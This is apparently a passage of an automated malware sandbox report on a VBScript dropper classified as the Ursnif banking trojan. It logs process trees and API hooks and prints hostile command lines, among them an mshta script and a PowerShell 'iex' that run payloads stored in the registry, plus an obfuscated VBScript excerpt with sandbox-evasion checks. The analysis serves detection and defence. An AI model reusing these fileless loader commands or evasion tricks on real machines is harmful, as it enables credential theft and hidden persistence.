Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767B0BB0 32_2_000001B5767B0BB0
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767B7434 32_2_000001B5767B7434
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767ABC1C 32_2_000001B5767ABC1C
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767A7CCC 32_2_000001B5767A7CCC
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767A34A0 32_2_000001B5767A34A0
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767E1570 32_2_000001B5767E1570
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\ogress.psd 034F2720D2408955AE412FD3657F6D1E50677CFCC8B5D030F3BC1F9D195AD21F
Java / VBScript file with very long strings (likely obfuscated code)
Source: PtgzM1Gd04Up.vbs Initial sample: Strings found which are bigger than 50
PE file does not import any functions
Source: cwptyz3z.dll.24.dr Static PE information: No import functions for PE file found
Source: z00zcx10.dll.26.dr Static PE information: No import functions for PE file found
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Tries to load missing DLLs
Source: C:\Windows\explorer.exe Section loaded: cryptdlg.dll
Source: C:\Windows\explorer.exe Section loaded: msimg32.dll
Source: classification engine Classification label: mal100.bank.troj.spyw.evad.winVBS@33/54@13/2
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\RecoveryStore.{8181790E-F663-11EA-90E2-ECF4BB862DED}.dat Jump to behavior
Source: C:\Windows\System32\control.exe Mutant created: \Sessions\1\BaseNamedObjects\{9EDCD723-651B-8095-DFB2-69B48306AD28}
Source: C:\Windows\System32\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{92E87600-C9EE-9429-E3E6-0D08C77A91BC}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{DA5DC80A-7193-1C76-CBAE-35102FC23944}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5388:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5564:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5788:120:WilError_01
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\adobe.url Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\PtgzM1Gd04Up.vbs'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\nslookup.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\nslookup.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: PtgzM1Gd04Up.vbs Virustotal: Detection: 19%
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\PtgzM1Gd04Up.vbs'
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4976 CREDAT:9474 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4976 CREDAT:4068644 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4976 CREDAT:9484 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4976 CREDAT:75036 /prefetch:2
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cwptyz3z.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESCAFE.tmp' 'c:\Users\user\AppData\Local\Temp\CSCD3EB2606A30F49E59B9A84403A1A868D.TMP'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\z00zcx10.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESD743.tmp' 'c:\Users\user\AppData\Local\Temp\CSC711CCB0208342BE82936D1DDCB3B6.TMP'
Source: unknown Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\90E6.bi1'
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /C 'echo -------- >> C:\Users\user\AppData\Local\Temp\90E6.bi1'
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4976 CREDAT:9474 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4976 CREDAT:4068644 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4976 CREDAT:9484 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4976 CREDAT:75036 /prefetch:2 Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cwptyz3z.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\z00zcx10.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESCAFE.tmp' 'c:\Users\user\AppData\Local\Temp\CSCD3EB2606A30F49E59B9A84403A1A868D.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESD743.tmp' 'c:\Users\user\AppData\Local\Temp\CSC711CCB0208342BE82936D1DDCB3B6.TMP'
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\90E6.bi1'
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C 'echo -------- >> C:\Users\user\AppData\Local\Temp\90E6.bi1'
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings Jump to behavior
Source: C:\Windows\explorer.exe File opened: C:\Windows\SYSTEM32\msftedit.dll
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\InternetRegistry\REGISTRY\USER\S-1-5-21-3853321935-2125563209-4053062332-1002\Software\Microsoft\Office\16.0\Lync Jump to behavior
Source: PtgzM1Gd04Up.vbs Static file information: File size 1452344 > 1048576
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll Jump to behavior
Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000018.00000002.531036846.0000026FC4860000.00000002.00000001.sdmp, csc.exe, 0000001A.00000002.539926352.0000014BDDC80000.00000002.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000001D.00000000.555737591.0000000007640000.00000002.00000001.sdmp
Source: Binary string: rundll32.pdb source: control.exe, 0000001E.00000002.580658833.000001C3E83CC000.00000004.00000040.sdmp
Source: Binary string: rundll32.pdbGCTL source: control.exe, 0000001E.00000002.580658833.000001C3E83CC000.00000004.00000040.sdmp
Source: Binary string: c:\meet\well\Brought\story\During\2\claim\84\Could\6\Element\Motion\3\Shore\market.pdb source: wscript.exe, 00000000.00000003.377834688.0000020569C36000.00000004.00000001.sdmp, ogress.psd.0.dr
Source: Binary string: wscui.pdb source: explorer.exe, 0000001D.00000000.555737591.0000000007640000.00000002.00000001.sdmp

Data Obfuscation:

barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.ScriptName, cStr(555551152)) > 0 And astronomy146 = 0) ThenExit Function' gargle triphammer fusillade Emile goober height Colombia317 Cameroon infantile macaque Virgil15 larynx Blair Vassar citron Marjory319 ticket Horowitz doubt pounce genius prolate expurgate trichloroethane hap114 gurgle spear Tommie stereo contraption clank710 counterfeit boutique teenage attrition stratify stannic polysemous volcanism candle stenographer649 noontime metallography, 8485223 chrome night clapboard squalid wacky. 1611065 iambic Belgrade697 peaceful kickback formulaic versus tuff598 xerox899 gaur registrable quagmire. distort767 bodybuilding channel diagrammed parolee900 Balzac. acme. Kirkpatrick stardom virgin payroll688, 230300 Corbett646 Isaiah tectonic Sharon787 abolition planet nightshade Bini touchdown condescension effusion728 societal proverbial822 raven erosion twig gadgetry. cavalier townsmen Arlen solitary exclusive Togo side960 crore gardenia skyhook proctor End IfSet waggle651 = GetObject("winmgmts:\\.\root\cimv2")Set adjust193lItems = waggle651.ExecQuery("Select * from Win32_Processor", , ((46 + 34.0) + (-((88 + (-60.0)) + 4.0))))For Each glycine543 In adjust193lItemsIf glycine543.NumberOfCores < (((1786 - 1758.0) + (40 + (-30.0))) - 35.0) ThenISsAHR = TrueREM soup extent populism curvilinear Ethiopia290 adposition lineman glycerinate77 Hillcrest Vance scapula metazoa console48 athletic herringbone raillery jure adorn fiance Middlesex miniature58 spiritual McHugh813 Bengal repelling pyrotechnic bivalve215 Cottrell Sandburg seder swart murk comprehend serology Tunis souvenir362 hoodlum quartile pike switchboard clairvoyant arabesque580 continual bindle collard616 chassis rainy fifteenth shorthand End IfREM prosody indices. 2301989 booky875 Swede hardcopy lessee devotion507, 9597409 Congo542 commandant493 Syria. bakery692. tori bushy560 highball nugget401 bedfast Copenhagen down commensurate dot paragon574 surname spree clairvoyant664 Oneida Bose636 CDC panicky. 851619 begetting. 5002303 bifocal945 Bushnell134 prick827 planeload113 equatorial187. keelson slapstick merchant511 nor contrabass leggy cluster Stewart rheostat Essen471 spheric re lobby henceforth merrymake spangle Leland contain Standish crutch607 blowup smuggle Wittgenstein650 fugal, 745304 Thessaly. 9793611 conqueror851 Casanova770 transferral spear282 indecomposable Macedonia ecosystem poison pathogenic, skipjack idyllic980 solitude moose Palomar Knapp un shrimp archetype yarn Multics radian Howe291 Cowan Caldwell, converge aching isocline Bavaria variable otiose977 voyage paper, autopilot332 NextIf ISsAHR ThenAYdtfwwDEnd If' minesweeper548 violin603, glove scowl mignon40 Markov lovebird, thirst godmother Mukden Cranford. gunmen Wilma genealogy ski tokamak947 abetting ecosystem715 apocalyptic, sora tyrannicide serf resist Eduardo Christensen Catherwood disrupt mercurial seaboard, 6929809 rein933 fin extent210 polytope. qua modern10 . indelicate lycopodium explicate hesi
Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) Jump to behavior
Compiles C# or VB.Net code
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cwptyz3z.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\z00zcx10.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cwptyz3z.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\z00zcx10.cmdline'
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\explorer.exe Code function: 29_2_04CF5699 push 3B000001h; retf 29_2_04CF569E
Source: C:\Windows\System32\control.exe Code function: 30_2_004F5699 push 3B000001h; retf 30_2_004F569E
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767B5699 push 3B000001h; retf 32_2_000001B5767B569E

Persistence and Installation Behavior:

barindex
Creates processes via WMI
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Drops PE files
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\cwptyz3z.dll Jump to dropped file
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\ogress.psd Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\z00zcx10.dll Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\ogress.psd Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Yara detected Ursnif
Source: Yara match File source: 0000001E.00000003.563919283.000001C3E6640000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.491933898.0000000005A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.555836306.0000000004C60000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.627702451.000001E98B13E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.491904248.0000000005A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.568586726.0000000005F20000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.492017144.0000000005A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.637761325.0000000004D1E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.579706123.000000000051E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.580157603.000001B5767DE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.491990075.0000000005A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.492004462.0000000005A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.498916612.000000000591B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.574197225.00000000028F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.625989422.000001357695E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.491965046.0000000005A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.627966819.00000257BF38E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.491881653.0000000005A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.579141799.000001B576620000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.491855597.0000000005A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3508, type: MEMORY
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4600, type: MEMORY
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4292, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5436, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 632, type: MEMORY
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 3756, type: MEMORY
Deletes itself after installation
Source: C:\Windows\System32\wscript.exe File deleted: c:\users\user\desktop\ptgzm1gd04up.vbs Jump to behavior
Hooks registry keys query functions (used to hide registry keys)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
Modifies the export address table of user mode modules (user mode EAT hooks)
Source: explorer.exe IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FF91A45521C
Modifies the import address table of user mode modules (user mode IAT hooks)
Source: explorer.exe EAT of a user mode module has changed: module: WININET.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FF91A455200
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\explorer.exe Registry key monitored for changes: HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
